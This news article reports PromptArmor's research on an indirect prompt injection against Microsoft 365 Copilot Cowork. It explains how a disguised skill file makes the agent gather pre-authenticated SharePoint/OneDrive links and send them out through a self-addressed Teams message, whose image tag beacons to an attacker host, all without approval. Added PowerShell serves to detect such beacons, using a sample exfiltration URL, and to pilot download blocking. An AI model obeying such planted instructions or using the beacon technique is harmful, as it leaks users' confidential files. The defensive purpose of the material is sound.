An AI security company has pointed out that 'Cowork,' the AI agent feature of Microsoft 365 Copilot, could leak SharePoint and OneDrive files without the user ever approving the action.

PromptArmor, an AI security company, reports that in Microsoft 365 Copilot Cowork, 'files on SharePoint and OneDrive may be leaked through indirect prompt injection.'
Microsoft Copilot Cowork Exfiltrates Files
Microsoft 365 Copilot Cowork is a feature of Microsoft 365 Copilot: an AI agent that performs tasks on the user's behalf, such as sending emails, posting to Teams, creating documents, scheduling meetings, and searching within the organization. According to Microsoft, Cowork operates within the scope of the user's permissions and displays an approval dialog before highly sensitive operations such as sending emails and posting to Teams.
PromptArmor's report shows that a type of attack called 'indirect prompt injection' is possible against it. Whereas a typical prompt injection alters the AI's behavior through text the user types in directly, indirect prompt injection embeds malicious instructions in external data such as web pages, documents, emails, and files, so that the AI carries out the attacker's intended actions when it reads that data.
According to PromptArmor, the attack uses 'skill files,' which are files that teach Copilot Cowork specific work procedures. PromptArmor illustrates the attack procedure as follows:
The starting point is the victim's environment. Files containing personal and financial information are stored in SharePoint and OneDrive, and the AI agent has access to those confidential files.

The victim uploads a malicious skill file obtained from the internet or elsewhere to Copilot Cowork. The skill file has a harmless-looking name such as 'weekly-review,' and its description reads like ordinary work support, for example 'reviews documents in progress for the past 7 days and posts a personal history snapshot to a Teams chat addressed to you.'

The attack begins when the user asks Cowork to 'review a week's worth of work.' Cowork reads the skill file to compile the work history, but the malicious instructions in the skill file direct Cowork to obtain pre-authenticated download links to files on SharePoint or OneDrive. A pre-authenticated download link is a link that lets anyone who opens it download the file, with no sign-in. According to PromptArmor, Cowork can obtain such links for any file the user has access to.

The central finding is that Teams posts and emails were sent without human approval whenever the recipient was the user who issued the request. Microsoft states that Cowork asks for approval before highly sensitive operations, but in PromptArmor's testing no approval was requested for Teams messages or emails addressed to the user themselves. Furthermore, an external image embedded in a Teams or Outlook message triggers a network request to the external site as soon as the user opens the message. PromptArmor explains that by placing the pre-authenticated download links inside a malicious HTML image tag, they were able to deliver the links to the attacker's server.
PromptArmor also points out that the malicious content is hard to spot in the activity log visible to the user. In PromptArmor's screenshot, even with Cowork's task details expanded, an action such as 'Send a Teams message' is visible, but the malicious HTML embedded in that message is not displayed. From the user's perspective, it simply looks as though a weekly review has been posted.

When the user opens the weekly review posted to them in a Teams chat, the external image in the message triggers the request, sending the pre-authenticated download link for the file to the attacker. The attacker then opens the received link and downloads the file from SharePoint or OneDrive. PromptArmor states that 'no human approval was required at any point in the attack process.'
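The exfiltration step above relies on an ordinary message feature: an HTML image whose source URL points at the attacker's host and carries the SharePoint or OneDrive link as a query parameter. The following is an added example, not code from PromptArmor's report or from Microsoft, of a detection function that scans the HTML body of a Teams or Outlook message for exactly that pattern. The image-host allowlist, the collector host name and both sample messages are constructed for illustration; the 'download.aspx' URL in the second sample is a stand-in for a pre-authenticated link, not the real token format.

```powershell
# Added example (not from PromptArmor or Microsoft). Flags <img> tags whose src
# points at a host outside the allowlist and smuggles another URL (in particular a
# SharePoint/OneDrive link) inside its path or query string.
function Find-ExfilImageBeacon {
    param(
        [Parameter(Mandatory)][string]$Html,
        # Hosts the organisation legitimately serves inline images from (assumed list).
        [string[]]$AllowedImageHosts = @('contoso.sharepoint.com', 'teams.microsoft.com')
    )

    $imgPattern = '<img\b[^>]*\bsrc\s*=\s*["'']([^"'']+)["'']'
    foreach ($m in [regex]::Matches($Html, $imgPattern, 'IgnoreCase')) {
        $src = $m.Groups[1].Value
        $uri = $null
        # Relative or malformed sources cannot beacon to an external host; skip them.
        if (-not [System.Uri]::TryCreate($src, [System.UriKind]::Absolute, [ref]$uri)) { continue }
        if ($AllowedImageHosts -contains $uri.Host.ToLower()) { continue }

        # Percent-decode everything after the host so an embedded URL becomes visible
        # even when it was passed as an encoded query value (u=https%3A%2F%2F...).
        $tail = [System.Uri]::UnescapeDataString($uri.PathAndQuery)
        $embedded = @([regex]::Matches($tail, 'https?://[^\s"''<>]+') | ForEach-Object Value)
        $carriesSharePoint = $tail -match '(?i)[a-z0-9-]+\.sharepoint\.com/'

        if ($embedded.Count -gt 0 -or $carriesSharePoint) {
            [pscustomobject]@{
                BeaconHost            = $uri.Host
                ImageSrc              = $src
                EmbeddedUrls          = $embedded
                CarriesSharePointLink = $carriesSharePoint
            }
        }
    }
}

# Constructed sample messages: one benign, one carrying a beacon.
$samples = @(
    '<p>Weekly review</p><img src="https://contoso.sharepoint.com/sites/ops/logo.png">',
    '<p>Weekly review</p><img src="https://collector.example.net/px.gif?u=https%3A%2F%2Fcontoso-my.sharepoint.com%2Fpersonal%2Fuser_contoso_com%2F_layouts%2F15%2Fdownload.aspx%3Fshare%3DEXAMPLETOKEN">'
)
foreach ($s in $samples) { Find-ExfilImageBeacon -Html $s }
```

Only the second sample produces a result: its beacon host is collector.example.net and the decoded query reveals the embedded SharePoint link. How message bodies are collected (for example from a Teams or mailbox export) is outside the example; the function only needs the HTML string.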

According to PromptArmor, the attack succeeded not only with the model selection set to 'Auto' but also when Claude Opus 4.7 was explicitly selected. Opus 4.7 in fact searched recently used documents more broadly than 'Auto' mode did, so files used in earlier Cowork sessions were included in the leak. PromptArmor also stated that the entire attack chain completed 5 out of 5 times with the same indirect prompt injection.

PromptArmor also cites the scheduled execution feature as something that makes the damage worse. Cowork lets users create tasks that run on a schedule, and a process like a weekly review is an obvious candidate for automation. PromptArmor points out that 'when a malicious skill file is repeatedly executed while the user is not in front of the screen, the user has fewer opportunities to stop the suspicious behavior midway.'

As a countermeasure, PromptArmor says it is important to reduce excessive permissions within the Microsoft 365 environment and narrow the range of information that AI agents can read. Microsoft's download blocking policy for SharePoint and OneDrive lets SharePoint administrators restrict file downloads from individual SharePoint sites and from OneDrive. According to Microsoft, when download blocking is enabled, users can only access files through a browser and cannot download, print, or sync them, and access from Microsoft 365 apps such as Word and Excel is also restricted.
Download blocking does, however, affect day-to-day usability. Microsoft recommends enabling the policy for a small group of users first and testing it against the apps used in your organization. PromptArmor also states that extra caution is needed whenever untrusted data is placed in a trusted context such as a skill file.
PromptArmor stresses that this is not a single bug but a design risk inherent in AI agents that operate with delegated privileges across enterprise systems. Each of the agent's individual functions, such as composing email, posting to Teams, and searching documents, is legitimate business support; once they can be chained and automated across multiple systems, the attack surface expands to include indirect prompt injection, and file leakage becomes possible.
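As an added example of the pilot rollout Microsoft recommends (this is not code from the PromptArmor report or from Microsoft's documentation), the following SharePoint Online Management Shell script enables the block download policy on one test site and one user's OneDrive, then reads the setting back so the change can be verified before it is widened. The tenant, site and OneDrive URLs are placeholders.

```powershell
# Added example (not from PromptArmor or Microsoft). Requires the SharePoint Online
# Management Shell module and a SharePoint administrator role.
# Placeholder tenant: contoso.
Connect-SPOService -Url 'https://contoso-admin.sharepoint.com'

# Pilot scope: one team site and one OneDrive (assumed URLs). Widen only after
# the apps used by the pilot users have been confirmed to work in browser-only mode.
$pilotSites = @(
    'https://contoso.sharepoint.com/sites/finance-pilot',
    'https://contoso-my.sharepoint.com/personal/user_contoso_com'
)

foreach ($site in $pilotSites) {
    # With the policy on, files on this site open in the browser only: download,
    # print, sync and desktop Office access are blocked, which also denies a
    # download link obtained by an agent acting as one of these users.
    Set-SPOSite -Identity $site -BlockDownloadPolicy $true
}

# Read the setting back for each pilot site before widening the rollout.
foreach ($site in $pilotSites) {
    Get-SPOSite -Identity $site | Select-Object Url, BlockDownloadPolicy
}

# Rollback for a pilot site whose users hit compatibility problems:
# Set-SPOSite -Identity 'https://contoso.sharepoint.com/sites/finance-pilot' -BlockDownloadPolicy $false
```

The policy is per site, so an agent running as a user whose files live on unprotected sites is unaffected; the point of the pilot is to find which sites can tolerate browser-only access before deciding how far to extend it.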